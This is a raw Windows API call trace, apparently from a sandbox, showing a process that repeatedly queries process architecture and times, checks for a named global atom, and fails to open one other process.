	[0130.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.090] CloseHandle (hObject=0x2dc) returned 1
	[0130.090] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.090] CloseHandle (hObject=0x2dc) returned 1
	[0130.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.091] CloseHandle (hObject=0x2dc) returned 1
	[0130.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.091] CloseHandle (hObject=0x2dc) returned 1
	[0130.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.091] CloseHandle (hObject=0x2dc) returned 1
	[0130.091] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.092] CloseHandle (hObject=0x2dc) returned 1
	[0130.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.092] CloseHandle (hObject=0x2dc) returned 1
	[0130.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.092] CloseHandle (hObject=0x2dc) returned 1
	[0130.092] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.092] CloseHandle (hObject=0x2dc) returned 1
	[0130.093] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.093] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.093] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.093] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.094] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.094] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.094] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.094] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.094] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.094] CloseHandle (hObject=0x2dc) returned 1
	[0130.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.094] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.094] CloseHandle (hObject=0x2dc) returned 1
	[0130.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.095] CloseHandle (hObject=0x2dc) returned 1
	[0130.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.095] CloseHandle (hObject=0x2dc) returned 1
	[0130.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.095] CloseHandle (hObject=0x2dc) returned 1
	[0130.095] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.095] CloseHandle (hObject=0x2dc) returned 1
	[0130.129] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.130] CloseHandle (hObject=0x2dc) returned 1
	[0130.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.130] CloseHandle (hObject=0x2dc) returned 1
	[0130.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.130] CloseHandle (hObject=0x2dc) returned 1
	[0130.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.130] CloseHandle (hObject=0x2dc) returned 1
	[0130.130] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.131] CloseHandle (hObject=0x2dc) returned 1
	[0130.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.131] CloseHandle (hObject=0x2dc) returned 1
	[0130.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.131] CloseHandle (hObject=0x2dc) returned 1
	[0130.131] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.131] CloseHandle (hObject=0x2dc) returned 1
	[0130.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.132] CloseHandle (hObject=0x2dc) returned 1
	[0130.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.132] CloseHandle (hObject=0x2dc) returned 1
	[0130.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.132] CloseHandle (hObject=0x2dc) returned 1
	[0130.132] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.132] CloseHandle (hObject=0x2dc) returned 1
	[0130.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.133] CloseHandle (hObject=0x2dc) returned 1
	[0130.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.133] CloseHandle (hObject=0x2dc) returned 1
	[0130.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.133] CloseHandle (hObject=0x2dc) returned 1
	[0130.133] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.133] CloseHandle (hObject=0x2dc) returned 1
	[0130.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.134] CloseHandle (hObject=0x2dc) returned 1
	[0130.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.134] CloseHandle (hObject=0x2dc) returned 1
	[0130.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.134] CloseHandle (hObject=0x2dc) returned 1
	[0130.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.134] CloseHandle (hObject=0x2dc) returned 1
	[0130.134] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.135] CloseHandle (hObject=0x2dc) returned 1
	[0130.135] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.135] CloseHandle (hObject=0x2dc) returned 1
	[0130.135] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.135] CloseHandle (hObject=0x2dc) returned 1
	[0130.135] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.135] CloseHandle (hObject=0x2dc) returned 1
	[0130.135] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.135] CloseHandle (hObject=0x2dc) returned 1
	[0130.136] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.136] CloseHandle (hObject=0x2dc) returned 1
	[0130.136] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.136] CloseHandle (hObject=0x2dc) returned 1
	[0130.136] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.136] CloseHandle (hObject=0x2dc) returned 1
	[0130.136] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.136] CloseHandle (hObject=0x2dc) returned 1
	[0130.137] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.137] CloseHandle (hObject=0x2dc) returned 1
	[0130.137] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.137] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.137] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.138] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.138] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.138] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.138] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.138] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.138] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.139] CloseHandle (hObject=0x2dc) returned 1
	[0130.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.139] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.139] CloseHandle (hObject=0x2dc) returned 1
	[0130.139] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.139] CloseHandle (hObject=0x2dc) returned 1
	[0130.139] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.139] CloseHandle (hObject=0x2dc) returned 1
	[0130.139] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.140] CloseHandle (hObject=0x2dc) returned 1
	[0130.140] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.140] CloseHandle (hObject=0x2dc) returned 1
	[0130.174] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.175] CloseHandle (hObject=0x2dc) returned 1
	[0130.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.175] CloseHandle (hObject=0x2dc) returned 1
	[0130.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.175] CloseHandle (hObject=0x2dc) returned 1
	[0130.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.175] CloseHandle (hObject=0x2dc) returned 1
	[0130.175] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.176] CloseHandle (hObject=0x2dc) returned 1
	[0130.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.176] CloseHandle (hObject=0x2dc) returned 1
	[0130.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.176] CloseHandle (hObject=0x2dc) returned 1
	[0130.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.176] CloseHandle (hObject=0x2dc) returned 1
	[0130.176] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.176] CloseHandle (hObject=0x2dc) returned 1
	[0130.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.177] CloseHandle (hObject=0x2dc) returned 1
	[0130.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.177] CloseHandle (hObject=0x2dc) returned 1
	[0130.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.177] CloseHandle (hObject=0x2dc) returned 1
	[0130.177] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.177] CloseHandle (hObject=0x2dc) returned 1
	[0130.178] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.178] CloseHandle (hObject=0x2dc) returned 1
	[0130.178] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.178] CloseHandle (hObject=0x2dc) returned 1
	[0130.178] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.178] CloseHandle (hObject=0x2dc) returned 1
	[0130.178] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.178] CloseHandle (hObject=0x2dc) returned 1
	[0130.178] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.178] CloseHandle (hObject=0x2dc) returned 1
	[0130.179] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.179] CloseHandle (hObject=0x2dc) returned 1
	[0130.179] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.179] CloseHandle (hObject=0x2dc) returned 1
	[0130.179] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.179] CloseHandle (hObject=0x2dc) returned 1
	[0130.179] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.179] CloseHandle (hObject=0x2dc) returned 1
	[0130.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.180] CloseHandle (hObject=0x2dc) returned 1
	[0130.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.180] CloseHandle (hObject=0x2dc) returned 1
	[0130.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.180] CloseHandle (hObject=0x2dc) returned 1
	[0130.180] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.180] CloseHandle (hObject=0x2dc) returned 1
	[0130.181] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.181] CloseHandle (hObject=0x2dc) returned 1
	[0130.181] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.181] CloseHandle (hObject=0x2dc) returned 1
	[0130.181] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.181] CloseHandle (hObject=0x2dc) returned 1
	[0130.181] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.181] CloseHandle (hObject=0x2dc) returned 1
	[0130.182] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.182] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.182] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.182] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.183] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.183] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.183] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.183] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.183] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.183] CloseHandle (hObject=0x2dc) returned 1
	[0130.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.183] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.184] CloseHandle (hObject=0x2dc) returned 1
	[0130.184] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.184] CloseHandle (hObject=0x2dc) returned 1
	[0130.184] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.184] CloseHandle (hObject=0x2dc) returned 1
	[0130.184] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.184] CloseHandle (hObject=0x2dc) returned 1
	[0130.184] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.184] CloseHandle (hObject=0x2dc) returned 1
	[0130.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.217] CloseHandle (hObject=0x2dc) returned 1
	[0130.217] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.217] CloseHandle (hObject=0x2dc) returned 1
	[0130.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.218] CloseHandle (hObject=0x2dc) returned 1
	[0130.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.218] CloseHandle (hObject=0x2dc) returned 1
	[0130.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.218] CloseHandle (hObject=0x2dc) returned 1
	[0130.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.218] CloseHandle (hObject=0x2dc) returned 1
	[0130.218] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.219] CloseHandle (hObject=0x2dc) returned 1
	[0130.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.219] CloseHandle (hObject=0x2dc) returned 1
	[0130.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.219] CloseHandle (hObject=0x2dc) returned 1
	[0130.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.219] CloseHandle (hObject=0x2dc) returned 1
	[0130.219] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.219] CloseHandle (hObject=0x2dc) returned 1
	[0130.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.220] CloseHandle (hObject=0x2dc) returned 1
	[0130.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.220] CloseHandle (hObject=0x2dc) returned 1
	[0130.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.220] CloseHandle (hObject=0x2dc) returned 1
	[0130.220] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.220] CloseHandle (hObject=0x2dc) returned 1
	[0130.221] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.221] CloseHandle (hObject=0x2dc) returned 1
	[0130.221] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.221] CloseHandle (hObject=0x2dc) returned 1
	[0130.221] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.221] CloseHandle (hObject=0x2dc) returned 1
	[0130.221] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.221] CloseHandle (hObject=0x2dc) returned 1
	[0130.222] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.222] CloseHandle (hObject=0x2dc) returned 1
	[0130.222] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.222] CloseHandle (hObject=0x2dc) returned 1
	[0130.222] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.222] CloseHandle (hObject=0x2dc) returned 1
	[0130.222] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.222] CloseHandle (hObject=0x2dc) returned 1
	[0130.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.223] CloseHandle (hObject=0x2dc) returned 1
	[0130.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.223] CloseHandle (hObject=0x2dc) returned 1
	[0130.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.223] CloseHandle (hObject=0x2dc) returned 1
	[0130.223] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.223] CloseHandle (hObject=0x2dc) returned 1
	[0130.224] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.224] CloseHandle (hObject=0x2dc) returned 1
	[0130.224] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.224] CloseHandle (hObject=0x2dc) returned 1
	[0130.224] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.224] CloseHandle (hObject=0x2dc) returned 1
	[0130.225] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.225] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0130.225] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0130.225] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.225] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0130.226] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0130.226] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0130.226] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0130.226] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0130.226] CloseHandle (hObject=0x2dc) returned 1
	[0130.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0130.226] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.226] CloseHandle (hObject=0x2dc) returned 1
	[0130.226] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.227] CloseHandle (hObject=0x2dc) returned 1
	[0130.227] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.227] CloseHandle (hObject=0x2dc) returned 1
	[0130.227] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.227] CloseHandle (hObject=0x2dc) returned 1
	[0130.227] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.227] CloseHandle (hObject=0x2dc) returned 1
	[0130.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.260] CloseHandle (hObject=0x2dc) returned 1
	[0130.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.260] CloseHandle (hObject=0x2dc) returned 1
	[0130.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.261] CloseHandle (hObject=0x2dc) returned 1
	[0130.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.261] CloseHandle (hObject=0x2dc) returned 1
	[0130.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.261] CloseHandle (hObject=0x2dc) returned 1
	[0130.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.261] CloseHandle (hObject=0x2dc) returned 1
	[0130.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.262] CloseHandle (hObject=0x2dc) returned 1
	[0130.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.262] CloseHandle (hObject=0x2dc) returned 1
	[0130.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.262] CloseHandle (hObject=0x2dc) returned 1
	[0130.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.262] CloseHandle (hObject=0x2dc) returned 1
	[0130.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.263] CloseHandle (hObject=0x2dc) returned 1
	[0130.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.263] CloseHandle (hObject=0x2dc) returned 1
	[0130.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.263] CloseHandle (hObject=0x2dc) returned 1
	[0130.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.263] CloseHandle (hObject=0x2dc) returned 1
	[0130.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.264] CloseHandle (hObject=0x2dc) returned 1
	[0130.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0130.264] CloseHandle (hObject=0x2dc) returned 1
